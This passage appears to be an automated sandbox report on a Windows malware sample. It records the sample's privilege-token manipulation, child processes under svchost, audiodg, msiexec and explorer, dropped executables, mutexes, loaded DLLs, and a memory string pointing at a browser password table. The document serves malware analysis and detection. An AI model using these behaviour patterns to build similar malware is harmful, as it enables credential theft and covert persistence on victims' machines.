              Source: C:\Windows\explorer.exe Code function: 5_2_0E102EE0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,OpenProcess,CloseHandle,5_2_0E102EE0
              Source: C:\Windows\explorer.exe Code function: 5_2_0E130008 AdjustTokenPrivileges,5_2_0E130008
              Source: C:\Windows\explorer.exe Code function: 5_2_0FF42EE0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,OpenProcess,CloseHandle,5_2_0FF42EE0
              Source: C:\Windows\explorer.exe Code function: 5_2_0FF70008 AdjustTokenPrivileges,5_2_0FF70008
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Code function: 7_2_00007FF6C5DB40A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,7_2_00007FF6C5DB40A4
              Source: C:\Windows\System32\audiodg.exe Code function: 9_2_00007FF6EC8440A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,9_2_00007FF6EC8440A4
              Source: C:\Windows\System32\msiexec.exe Code function: 10_2_00007FF6345C40A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,10_2_00007FF6345C40A4
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Code function: 0_2_00007FF7E83C3DE4 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,wcscmp,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00007FF7E83C3DE4
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe File created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053
              Source: C:\Windows\System32\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
              Source: C:\Windows\System32\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\rbNSpGEsyb
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Mutant created: NULL
              Source: C:\Windows\System32\audiodg.exe Mutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
              Source: C:\Windows\System32\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
              Source: C:\Windows\System32\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\GqgWzd
              Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F72F.tmp
              Source: uFVgJVXaEU.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
              Source: C:\Windows\explorer.exe File read: C:\Users\user\Searches\desktop.ini
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002B48000.00000004.00000800.00020000.00000000.sdmp, F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: uFVgJVXaEU.exe ReversingLabs: Detection: 57%
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe File read: C:\Users\user\Desktop\uFVgJVXaEU.exe
              Source: unknown Process created: C:\Users\user\Desktop\uFVgJVXaEU.exe "C:\Users\user\Desktop\uFVgJVXaEU.exe"
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
              Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe"
              Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
              Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe"
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe"
              Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Section loaded: ntmarta.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
              Source: C:\Windows\explorer.exe Section loaded: secur32.dll
              Source: C:\Windows\explorer.exe Section loaded: version.dll
              Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
              Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
              Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
              Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
              Source: C:\Windows\explorer.exe Section loaded: workfoldersshell.dll
              Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
              Source: C:\Windows\explorer.exe Section loaded: cdprt.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: dwrite.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: msvcp140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: secur32.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: rstrtmgr.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: ncrypt.dll
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Section loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Section loaded: wininet.dll
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Section loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Section loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Section loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Section loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\audiodg.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Section loaded: vcruntime140.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeSection loaded: libffi-7.dllJump to behavior
              Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: uFVgJVXaEU.exe Static PE information: Image base 0x140000000 > 0x60000000
              Source: uFVgJVXaEU.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609827265.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610543566.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605079743.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1632238467.00007FFBBB935000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605738557.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604778086.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607581691.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609401461.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611370859.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1632487423.00007FFBC3201000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605348657.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607843222.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607058503.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608628812.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604870009.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.amd64.pdbGCTL source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1632632314.00007FFBC321E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606094024.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604568784.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604985991.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608404585.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
              Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606490661.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: 21AB.tmp.zx.exe, 0000000D.00000002.1632238467.00007FFBBB935000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: vcruntime140.amd64.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1632632314.00007FFBC321E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611718162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605261861.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607206409.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605956547.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604669158.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608235922.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1631752112.00007FFBAAE7D000.00000002.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610124454.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605640873.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606311059.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605846257.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611918910.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606809485.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607729908.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606922801.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605173726.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610339466.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605543300.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605445250.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609596519.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611567066.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: F72F.tmp.ssg.exe.5.dr Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Code function: 0_2_00007FF7E83C14EC LoadLibraryA,GetProcAddress,0_2_00007FF7E83C14EC
              Source: uFVgJVXaEU.exe Static PE information: section name: .x64
              Source: 2F409E82DCA61388941053.exe.0.dr Static PE information: section name: .x64
              Source: 2D25.tmp.update.exe.5.dr Static PE information: section name: .x64
              Source: libcrypto-1_1.dll.12.dr Static PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Code function: 0_2_00007FF7E83CEA11 push rcx; iretd 0_2_00007FF7E83CEA12
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Code function: 0_2_00007FF7E83CE812 push rbp; iretd 0_2_00007FF7E83CE813
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Code function: 0_2_00007FF7E83CE9B3 push 00000041h; ret 0_2_00007FF7E83CE9C4
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Code function: 0_2_00007FF7E83CE9A9 push rbp; iretd 0_2_00007FF7E83CE9AA
              Source: C:\Windows\System32\svchost.exe Code function: 3_2_00007FF67E6DE9B3 push 00000041h; ret 3_2_00007FF67E6DE9C4
              Source: C:\Windows\System32\svchost.exe Code function: 3_2_00007FF67E6DE9A9 push rbp; iretd 3_2_00007FF67E6DE9AA
              Source: C:\Windows\System32\svchost.exe Code function: 3_2_00007FF67E6DE812 push rbp; iretd 3_2_00007FF67E6DE813
              Source: C:\Windows\System32\svchost.exe Code function: 3_2_00007FF67E6DEA11 push rcx; iretd 3_2_00007FF67E6DEA12
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD0408 push rbp; retf 5_2_0DFD039B
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFE07C0 push rbp; retf 5_2_0DFE07C3
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFE07A8 push rbp; retf 5_2_0DFE07AB
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFE0750 push rdi; retf 5_2_0DFE0763
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFE0738 push rbp; retf 5_2_0DFE0743
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFE0710 push rsi; retf 5_2_0DFE0713
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFE0710 push rdi; retf 5_2_0DFE075B
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD01F8 push rsi; retf 5_2_0DFD01FB
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD01F0 push r14; retf 5_2_0DFD01F3
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD01E8 push r14; retf 5_2_0DFD01EB
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD01E0 push rsi; retf 5_2_0DFD01E3
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD01C0 push rbp; retf 5_2_0DFD019B
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD01C0 push r14; retf 5_2_0DFD01D3
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD01B8 push r14; retf 5_2_0DFD01D3
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD01A0 push rbp; retf 5_2_0DFD01A3
